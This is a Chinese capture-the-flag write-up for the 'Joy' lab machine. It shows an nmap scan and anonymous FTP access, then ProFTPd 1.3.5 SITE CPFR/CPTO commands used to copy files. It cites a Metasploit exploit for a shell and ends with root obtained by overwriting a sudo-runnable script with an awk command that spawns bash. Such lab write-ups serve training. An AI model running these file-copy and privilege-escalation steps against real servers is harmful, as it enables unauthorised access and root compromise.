joy靶机靶场渗透

1.扫描主机

nmap扫描主机

Nmap scan report for 192.168.100.132
Host is up (0.00034s latency).
Not shown: 988 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: 00:0C:29:5A:AF:CE (VMware)

尝试ftp 用anonymous空密码登录

get directory到本地查看

root@kali:~/joy# cat directory 
Patrick's Directory
total 152
drwxr-xr-x 18 patrick patrick 4096 Feb 13 23:40 .
drwxr-xr-x  4 root    root    4096 Jan  6  2019 ..
-rw-r--r--  1 patrick patrick    0 Feb 13 22:45 1p7WHwvzeABBPt4KkGOypRYIztqPiQGw.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 22:55 35Od35p0FjacKjZ7CIA04Qodkh9BxrPi.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:15 64AYIQIbRHfkqDUnHQTJAtVmTIDviAdy.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:30 6ma4z0wzAewjAKWu1ehIxZwHOS3PxFIF.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:25 7S04t7kldXattvEh3tsfCXbJBtL20u3C.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 22:50 7WGf4cJPiKnGSdsu2AM0rMznRqNJUFGZ.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:20 7yATiRDp46XJOfoolcMBaUwCaXAtZF0zc9mITPDAwyAwm7rtcCOVLaCdUpqcd9Hj.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:10 9cJF5S8jZGE7wh84iwkvZvvU1jeteNCXcBf253nedX1YIQah6vgntkEftIxCdgfK.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:05 9geHegRe099CGGWT2EEpkpOZM4Nr34XX.txt
-rw-------  1 patrick patrick  185 Jan 28  2019 .bash_history
-rw-r--r--  1 patrick patrick  220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick 3526 Dec 23  2018 .bashrc
drwx------  7 patrick patrick 4096 Jan 10  2019 .cache
-rw-r--r--  1 patrick patrick    0 Feb 13 23:10 cFWaWa3ip89Kj1RTqIHo7ZuFDQHPoDOD.txt
drwx------ 10 patrick patrick 4096 Dec 26  2018 .config
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Desktop
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick 4096 Jan  6  2019 Downloads
-rw-r--r--  1 patrick patrick    0 Feb 13 23:20 eQYwBAebPw59c26u0UsamXrXkP10GILY.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:35 Fs8TbaKUyJCxOMEDL5ZVJxbqcaQqlsZG.txt
drwx------  3 patrick patrick 4096 Dec 26  2018 .gnupg
-rwxrwxrwx  1 patrick patrick    0 Jan  9  2019 haha
-rw-r--r--  1 patrick patrick   24 Feb 13 23:30 ia5hVwcBag1IwpnBhdjw3gTShwDXwh7HkoUDVYmssVMaX64lx8dmczuXr7W5TbIa.txt
-rw-------  1 patrick patrick 8532 Jan 28  2019 .ICEauthority
-rw-r--r--  1 patrick patrick    0 Feb 13 23:40 JpIK4Qxt67Vttc1ADXE239wQhPC89kGL.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:40 jYep3dpBG0fgjMoIpHqRRmOB56NvzIJtGzSfgdsSULqw1YtuTY4hORGp1dt1SE1C.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:05 Kko1BTnf5Bck24Ha26IPQupjb3BpbwNP5i7suE0uBFMCPHXRYtxSlfWlJHhKVSv9.txt
drwxr-xr-x  3 patrick patrick 4096 Dec 26  2018 .local
-rw-r--r--  1 patrick patrick   24 Feb 13 22:55 MFUuLYbtSjYOJFmXwISxQKgW356M0WOBSXbsxjoloaQKqAVsTdT7RvnehlPcyNRv.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:00 mgJgyHQDjVFgIAebTpH4rcZLmIjUn51eoroOUIBkinpSDAfT9Peze7MLbfwkq6Gf.txt
drwx------  5 patrick patrick 4096 Dec 28  2018 .mozilla
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Music
drwxr-xr-x  2 patrick patrick 4096 Jan  8  2019 .nano
-rw-r--r--  1 patrick patrick   24 Feb 13 22:50 ohQb9KNNwW3HNhVq50l7QKPlOVhwvNbnXvRke2r4F8uhi9IJRM0I863CSkaxzvzJ.txt
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick  675 Dec 23  2018 .profile
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick   24 Feb 13 23:35 qj3FWDupjdMWDhs3gbCvRVnHO0WYUn077LGJrrjDEVOiZ5ac8xxo9knmhgSXsOSL.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:00 qxP7CYF3llofecDFLMEnjGJC5czH6aOj.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 22:45 rAtrdQA1u0OSu8OgwyHCZOnfbtknUgAmhVU9BT0Hnew9GU5pG3lPQT82NyvijU1r.txt
d---------  2 root    root    4096 Jan  9  2019 script
drwx------  2 patrick patrick 4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 Sun
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:25 UCotfI8X6dXQquvUrR8bGP3Fy4iXnqhs4J2D0ixh5zAAswS0QMgmDzxv2sDZs4FR.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:15 UFhY9ZFrPHOl09e11YQLCOlNledaXj9Bdo2xZUgBqMpjA1QARplFQrpuqmvfpbVm.txt
-rw-r--r--  1 patrick patrick  407 Jan 27  2019 version_control
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Videos

version_control或许会有信息泄露

使用telnet的拷贝命令可以将 patrick目录的 version_control复制到ftp的目录进行查看

root@kali:~/joy# telnet 192.168.100.132 21
Trying 192.168.100.132...
Connected to 192.168.100.132.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
qiut
500 QIUT not understood
quit
221 Goodbye.
Connection closed by foreign host.
root@kali:~/joy# ls
directory  project_emilio  reminder  version_control
root@kali:~/joy# cat version_control 
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.

发现版本信息和/var/www/tryingharderisjoy为根目录

查找ProFTPd: 1.3.5是否有漏洞

发现1.3.5有命令执行漏洞且支持msf

使用msf攻击获取shell

2.提权

发现用户和密码su patrick并sudo -l发现test文件可以root权限执行，可以写入文件一条简单shell脚本命令

但没有权限直接改写文件，可以通过ftp上传并覆盖文件

root@kali:~/joy# echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
root@kali:~/joy# ftp 192.168.100.132
Connected to 192.168.100.132.
220 The Good Tech Inc. FTP Server
Name (192.168.100.132:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Feb 13 16:26 upload
226 Transfer complete
ftp> cd upload
ftp> put test
local: test remote: test
200 PORT command successful
150 Opening BINARY mode data connection for test
226 Transfer complete
32 bytes sent in 0.00 secs (625.0000 kB/s)

root@kali:~/joy# telnet 192.168.100.132 21
Trying 192.168.100.132...
Connected to 192.168.100.132.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/test
350 File or directory exists, ready for destination name
site cpto /home/patrick/script/test
250 Copy successful
421 Login timeout (300 seconds): closing control connection
Connection closed by foreign host.

提权成功

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！